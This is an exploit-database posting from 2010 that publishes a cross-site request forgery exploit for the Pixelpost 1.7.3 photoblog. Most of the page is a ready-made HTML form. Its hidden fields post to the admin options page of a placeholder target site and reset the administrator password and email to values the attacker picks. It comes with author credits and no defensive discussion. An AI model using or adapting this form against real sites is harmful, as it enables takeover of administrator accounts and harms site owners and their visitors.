pixelpost v1.7.3 CSRF change admin password

Posted on 15 September 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>pixelpost v1.7.3 CSRF change admin password</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>===========================================
pixelpost v1.7.3 CSRF change admin password
===========================================


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /'             __  /'__`        / \__  /'__`                   0
0  /\_,     ___   /\_/\_      ___  ,_/ /   _ ___           1
1  /_/  /' _ ` / /_/_\_&lt;_  /'___  /    /`'__          0
0       / /    /   / \__/  \_  \_   /           1
1       \_ \_ \_\_   \____/ \____\ \__\ \____/ \_           0
0       /_//_//_/ \_ /___/  /____/ /__/ /___/  /_/           1
1                   \____/ &gt;&gt; Exploit database separated by exploit   0
0                   /___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    ######################################            1
0                       Sweet the Algerian Haxxor                      0
1                    ######################################            0
0                                                                      1
1  [+]Exploit Title: pixelpost_v1.7.3 CSRF change admin password       0
0  [+]Date: 15/09/2010                                                 1
1  [+]Author: Sweet                                                    0
0  [+]Contact : charif38@hotmail.fr                                    0
1  [+]Software Link:  http://www.pixelpost.org/                        0
0  [+]Download: http://www.pixelpost.org/                              1
1  [+]Version: 1.7.3                                                   0
0  [+]Tested on: WinXp sp3                                             1
1  [+]Risk :Hight                                                      0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1


---=CSRF change admin password=--- 
&lt;html&gt;
&lt;body&gt;
&lt;h1&gt;Pixelpost_v1.7.3 change admin password CSRF by Sweet &lt;/h1&gt;
&lt;form method=&quot;POST&quot; name=&quot;form0&quot; action=&quot;http://www.target.com/path/admin/index.php?view=options&amp;optaction=updateall&quot;&gt;
&lt;input type=&quot;hidden&quot; name=&quot;new_site_title&quot; value=&quot;Pixelpost&quot;/&gt;
&lt;input type=&quot;hidden&quot; name=&quot;new_sub_title&quot; value=&quot;Authentic photoblog flavour&quot;/&gt;
&lt;input type=&quot;hidden&quot; name=&quot;new_site_url&quot; value=&quot;http://www.target.com/path/&quot;/&gt;
&lt;input type=&quot;hidden&quot; name=&quot;new_admin_user&quot; value=&quot;admin&quot;/&gt;
&lt;input type=&quot;hidden&quot; name=&quot;newadminpass&quot; value=&quot;password&quot;/&gt; &lt;!-- Your password here --&gt;
&lt;input type=&quot;hidden&quot; name=&quot;newadminpass_re&quot; value=&quot;password&quot;/&gt; &lt;!-- Your password here --&gt;
&lt;input type=&quot;hidden&quot; name=&quot;passchanged&quot; value=&quot;no&quot;/&gt;
&lt;input type=&quot;hidden&quot; name=&quot;new_lang&quot; value=&quot;english&quot;/&gt;
&lt;input type=&quot;hidden&quot; name=&quot;alt_lang&quot; value=&quot;Off&quot;/&gt;
&lt;input type=&quot;hidden&quot; name=&quot;new_admin_lang&quot; value=&quot;english&quot;/&gt;
&lt;input type=&quot;hidden&quot; name=&quot;new_email&quot; value=&quot;charif38@hotmail.fr&quot;/&gt;&lt;!-- Your Email here here --&gt;
&lt;input type=&quot;hidden&quot; name=&quot;new_image_path&quot; value=&quot;../images/&quot;/&gt;
&lt;input type=&quot;hidden&quot; name=&quot;new_thumbnail_path&quot; value=&quot;../thumbnails/&quot;/&gt;
&lt;input type=&quot;hidden&quot; name=&quot;timezone&quot; value=&quot;0&quot;/&gt;
&lt;input type=&quot;hidden&quot; name=&quot;global_comments&quot; value=&quot;A&quot;/&gt;
&lt;input type=&quot;hidden&quot; name=&quot;new_commentemail&quot; value=&quot;no&quot;/&gt;
&lt;input type=&quot;hidden&quot; name=&quot;new_htmlemailnote&quot; value=&quot;yes&quot;/&gt;
&lt;input type=&quot;hidden&quot; name=&quot;timestamp&quot; value=&quot;yes&quot;/&gt;
&lt;input type=&quot;hidden&quot; name=&quot;visitorbooking&quot; value=&quot;yes&quot;/&gt;
&lt;input type=&quot;hidden&quot; name=&quot;markdown&quot; value=&quot;F&quot;/&gt;
&lt;input type=&quot;hidden&quot; name=&quot;exif&quot; value=&quot;T&quot;/&gt;
&lt;input type=&quot;hidden&quot; name=&quot;feed_title&quot; value=&quot;Pixelpost&quot;/&gt;
&lt;input type=&quot;hidden&quot; name=&quot;feed_description&quot; value=&quot;Authentic photoblog flavour&quot;/&gt;
&lt;input type=&quot;hidden&quot; name=&quot;feed_copyright&quot; value=&quot;Copyright 2010 http://www.target.com/path/, All Rights Reserved&quot;/&gt;
&lt;input type=&quot;hidden&quot; name=&quot;feed_discovery&quot; value=&quot;RA&quot;/&gt;
&lt;input type=&quot;hidden&quot; name=&quot;feed_external_type&quot; value=&quot;ER&quot;/&gt;
&lt;input type=&quot;hidden&quot; name=&quot;feed_external&quot; value=&quot;&quot;/&gt;
&lt;input type=&quot;hidden&quot; name=&quot;allow_comment_feed&quot; value=&quot;Y&quot;/&gt;
&lt;input type=&quot;hidden&quot; name=&quot;rsstype&quot; value=&quot;T&quot;/&gt;
&lt;input type=&quot;hidden&quot; name=&quot;feeditems&quot; value=&quot;10&quot;/&gt;
&lt;input type=&quot;hidden&quot; name=&quot;display_sort_by&quot; value=&quot;datetime&quot;/&gt;
&lt;input type=&quot;hidden&quot; name=&quot;display_order&quot; value=&quot;default&quot;/&gt;
&lt;p&gt; Push the button &lt;input type=&quot;submit&quot; name=&quot;update&quot; value=&quot;GO!&quot;/&gt;&lt;/p&gt;
&lt;/form&gt;
&lt;/body&gt;
&lt;/html&gt;

thx to Milw0rm.com , JF - Hamst0r - Keystroke  , inj3ct0r.com , exploit-db.com


1,2,3 viva L'Algerie :))


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-15]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
TOP
Malware :

Last 20
Exploits :

Last 20